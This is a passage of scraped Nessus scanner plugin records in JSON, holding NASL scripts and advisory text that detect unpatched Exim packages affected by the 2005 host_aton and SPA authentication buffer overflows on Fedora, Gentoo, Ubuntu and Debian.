audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 3.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC3\", reference:\"exim-4.43-1.FC3.1\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"exim-debuginfo-4.43-1.FC3.1\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"exim-doc-4.43-1.FC3.1\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"exim-mon-4.43-1.FC3.1\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"exim-sa-4.43-1.FC3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-doc / exim-mon / exim-sa\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:08:19", "bulletinFamily": "scanner", "description": "This erratum fixes two relatively minor security issues which were discovered in Exim in the last few weeks. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2005-0021 and CVE-2005-0022 to these, respectively.\n\n1. The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication. This code originated in the Samba project. The overflow can be exploited only if you are using SPA authentication.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-07-19T00:00:00", "id": "FEDORA_2005-001.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=16113", "published": "2005-01-07T00:00:00", "title": "Fedora Core 2 : exim-4.43-1.FC2.1 (2005-001)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2005-001.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16113);\n script_version (\"1.13\");\n script_cvs_date(\"Date: 2018/07/19 23:19:04\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_xref(name:\"FEDORA\", value:\"2005-001\");\n\n script_name(english:\"Fedora Core 2 : exim-4.43-1.FC2.1 (2005-001)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This erratum fixes two relatively minor security issues which were\ndiscovered in Exim in the last few weeks. The Common Vulnerabilities\nand Exposures project (cve.mitre.org) has assigned the names\nCVE-2005-0021 and CVE-2005-0022 to these, respectively.\n\n1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication. This code originated in the Samba project. The\noverflow can be exploited only if you are using SPA authentication.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2005-January/000555.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?080b4ac1\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim-sa\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/01/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^2([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 2.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC2\", reference:\"exim-4.43-1.FC2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"exim-debuginfo-4.43-1.FC2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"exim-doc-4.43-1.FC2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"exim-mon-4.43-1.FC2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"exim-sa-4.43-1.FC2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-doc / exim-mon / exim-sa\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:08:22", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-200501-23 (Exim: Two buffer overflows)\n\n Buffer overflows have been found in the host_aton() function (CAN-2005-0021) as well as in the spa_base64_to_bits() function (CAN-2005-0022), which is part of the SPA authentication code.\n Impact :\n\n A local attacker could trigger the buffer overflow in host_aton() by supplying an illegal IPv6 address with more than 8 components, using a command line option. The second vulnerability could be remotely exploited during SPA authentication, if it is enabled on the server.\n Both buffer overflows can potentially lead to the execution of arbitrary code.\n Workaround :\n\n There is no known workaround at this time.", "modified": "2018-08-10T00:00:00", "id": "GENTOO_GLSA-200501-23.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=16414", "published": "2005-02-14T00:00:00", "title": "GLSA-200501-23 : Exim: Two buffer overflows", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200501-23.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16414);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/08/10 18:07:05\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_xref(name:\"GLSA\", value:\"200501-23\");\n\n script_name(english:\"GLSA-200501-23 : Exim: Two buffer overflows\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200501-23\n(Exim: Two buffer overflows)\n\n Buffer overflows have been found in the host_aton() function\n (CAN-2005-0021) as well as in the spa_base64_to_bits() function\n (CAN-2005-0022), which is part of the SPA authentication code.\n \nImpact :\n\n A local attacker could trigger the buffer overflow in host_aton()\n by supplying an illegal IPv6 address with more than 8 components, using\n a command line option. The second vulnerability could be remotely\n exploited during SPA authentication, if it is enabled on the server.\n Both buffer overflows can potentially lead to the execution of\n arbitrary code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200501-23\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Exim users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-mta/exim-4.43-r2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"mail-mta/exim\", unaffected:make_list(\"ge 4.43-r2\"), vulnerable:make_list(\"lt 4.43-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Exim\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:08:57", "bulletinFamily": "scanner", "description": "A flaw has been found in the host_aton() function, which can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components. When supplying certain command line parameters, the input was not checked, so that a local attacker could possibly exploit the buffer overflow to run arbitrary code with the privileges of the Exim mail server. (CAN-2005-0021)\n\nAdditionally, the BASE64 decoder in the SPA authentication handler did not check the size of its output buffer. By sending an invalid BASE64 authentication string, a remote attacker could overflow the buffer, which could possibly be exploited to run arbitrary code with the privileges of the Exim mail server. (CAN-2005-0022).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-07-19T00:00:00", "id": "UBUNTU_USN-56-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=20674", "published": "2006-01-15T00:00:00", "title": "Ubuntu 4.10 : exim4 vulnerabilities (USN-56-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-56-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20674);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/07/19 23:44:03\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_xref(name:\"USN\", value:\"56-1\");\n\n script_name(english:\"Ubuntu 4.10 : exim4 vulnerabilities (USN-56-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw has been found in the host_aton() function, which can overflow\na buffer if it is presented with an illegal IPv6 address that has more\nthan 8 components. When supplying certain command line parameters, the\ninput was not checked, so that a local attacker could possibly exploit\nthe buffer overflow to run arbitrary code with the privileges of the\nExim mail server. (CAN-2005-0021)\n\nAdditionally, the BASE64 decoder in the SPA authentication handler did\nnot check the size of its output buffer. By sending an invalid BASE64\nauthentication string, a remote attacker could overflow the buffer,\nwhich could possibly be exploited to run arbitrary code with the\nprivileges of the Exim mail server. (CAN-2005-0022).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:eximon4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:4.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2005-2018 Canonical, Inc. / NASL script (C) 2006-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(4\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 4.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"4.10\", pkgname:\"exim4\", pkgver:\"4.34-5ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"exim4-base\", pkgver:\"4.34-5ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"exim4-config\", pkgver:\"4.34-5ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.34-5ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"exim4-daemon-light\", pkgver:\"4.34-5ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"eximon4\", pkgver:\"4.34-5ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim4 / exim4-base / exim4-config / exim4-daemon-heavy / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:08:19", "bulletinFamily": "scanner", "description": "The remote host is running Exim, a message transfer agent (SMTP).\n\nIt is reported that Exim is prone to an IPv6 Address and an SPA authentication buffer overflow. An attacker, exploiting this issue, may be able to execute arbitrary code on the remote host.\n\nExim must be configured with SPA Authentication or with IPv6 support to exploit those flaws.\n\nIn addition, Exim is vulnerable to two local overflows in command line option handling. However, Nessus has not tested for these.", "modified": "2018-07-10T00:00:00", "id": "EXIM_SPA_IPV6_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=16111", "published": "2005-01-07T00:00:00", "title": "Exim < 4.44 Multiple Overflows", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16111);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/07/10 14:27:33\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185,12188);\n\n script_name(english:\"Exim < 4.44 Multiple Overflows\");\n script_summary(english:\"Exim Illegal IPv6 Address and SPA Authentication Buffer Overflow Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote mail server is vulnerable to a buffer overflow attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Exim, a message transfer agent (SMTP).\n\nIt is reported that Exim is prone to an IPv6 Address and an SPA\nauthentication buffer overflow. An attacker, exploiting this issue,\nmay be able to execute arbitrary code on the remote host.\n\nExim must be configured with SPA Authentication or with IPv6 support\nto exploit those flaws.\n\nIn addition, Exim is vulnerable to two local overflows in command line\noption handling. However, Nessus has not tested for these.\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Exim 4.44 or newer\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/01/07\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:exim:exim\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SMTP problems\");\n\n script_dependencie(\"smtpserver_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smtp_func.inc\");\n\n#\n# RHEL 4, CentOS 4, and more ship wih a (patched) version of exim by default\n#\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_kb_item(\"Services/smtp\");\nif(!port) port = 25;\nif (! get_port_state(port)) exit(0);\n\nbanner = get_smtp_banner(port:port);\nif(!banner)exit(0);\nif ( \"Exim\" >!< banner ) exit(0);\n\nif(egrep(pattern:\"220.*Exim ([0-3]\\.|4\\.([0-9][^0-9]|[0-3][0-9]|4[0-3][^0-9]))\", string:banner))\n security_hole(port);\n\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:08:19", "bulletinFamily": "scanner", "description": "Philip Hazel announced a buffer overflow in the host_aton function in exim-tls, the SSL-enabled version of the default mail-transport-agent in Debian, which can lead to the execution of arbitrary code via an illegal IPv6 address.", "modified": "2018-08-09T00:00:00", "id": "DEBIAN_DSA-637.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=16155", "published": "2005-01-13T00:00:00", "title": "Debian DSA-637-1 : exim-tls - buffer overflow", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-637. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16155);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/08/09 17:06:36\");\n\n script_cve_id(\"CVE-2005-0021\");\n script_xref(name:\"DSA\", value:\"637\");\n\n script_name(english:\"Debian DSA-637-1 : exim-tls - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Philip Hazel announced a buffer overflow in the host_aton function in\nexim-tls, the SSL-enabled version of the default mail-transport-agent\nin Debian, which can lead to the execution of arbitrary code via an\nillegal IPv6 address.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=289046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-637\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the exim-tls package.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 3.35-3woody3.\n\nIn the unstable distribution (sid) this package does not exist\nanymore.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim-tls\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/01/13\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"exim-tls\", reference:\"3.35-3woody3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:08:19", "bulletinFamily": "scanner", "description": "Philip Hazel announced a buffer overflow in the host_aton function in exim, the default mail-transport-agent in Debian, which can lead to the execution of arbitrary code via an illegal IPv6 address.", "modified": "2018-08-09T00:00:00", "id": "DEBIAN_DSA-635.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=16132", "published": "2005-01-12T00:00:00", "title": "Debian DSA-635-1 : exim - buffer overflow", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-635. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16132);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/08/09 17:06:36\");\n\n script_cve_id(\"CVE-2005-0021\");\n script_xref(name:\"DSA\", value:\"635\");\n\n script_name(english:\"Debian DSA-635-1 : exim - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Philip Hazel announced a buffer overflow in the host_aton function in\nexim, the default mail-transport-agent in Debian, which can lead to\nthe execution of arbitrary code via an illegal IPv6 address.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=289046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-635\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the exim and exim4 packages.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 3.35-1woody4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/01/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) 